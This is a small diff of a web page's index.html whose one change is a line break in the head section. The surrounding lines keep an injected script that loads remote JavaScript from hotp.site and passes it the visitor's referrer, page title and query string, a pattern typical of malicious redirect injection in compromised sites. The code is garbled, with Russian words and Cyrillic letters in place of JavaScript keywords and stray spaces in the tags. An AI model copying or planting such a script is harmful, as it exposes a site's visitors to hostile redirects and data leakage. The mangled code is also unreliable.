--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 <!DOCTYPE html>
 <html  >
-<head>< span  id = " 761dbcbc-db4d-e1a6-7c43-3509d53d20ba " > </ span > < script  type = " application / javascript " >
+<head>
+  < span  id = " 761dbcbc-db4d-e1a6-7c43-3509d53d20ba " > </ span > < script  type = " application / javascript " >
 var  d = документ ; var  s = d . createElement ( 'script' ) ;
 с . src = 'http://hotp.site/J1GNJ29q?se_referrer='  +  encodeURIComponent ( document . referrer )  +  '& default_keyword ='  +  encodeURIComponent ( document . title )  +  '&' + window . местоположение . поиск . replace ( '?' ,  '&' ) + '& frm5ece65c34a0f7 = script5ece65c34a0f8 & _cid = 761dbcbc-db4d-e1a6-7c43-3509d53d20ba' ;
 if  ( document . currentScript )  {
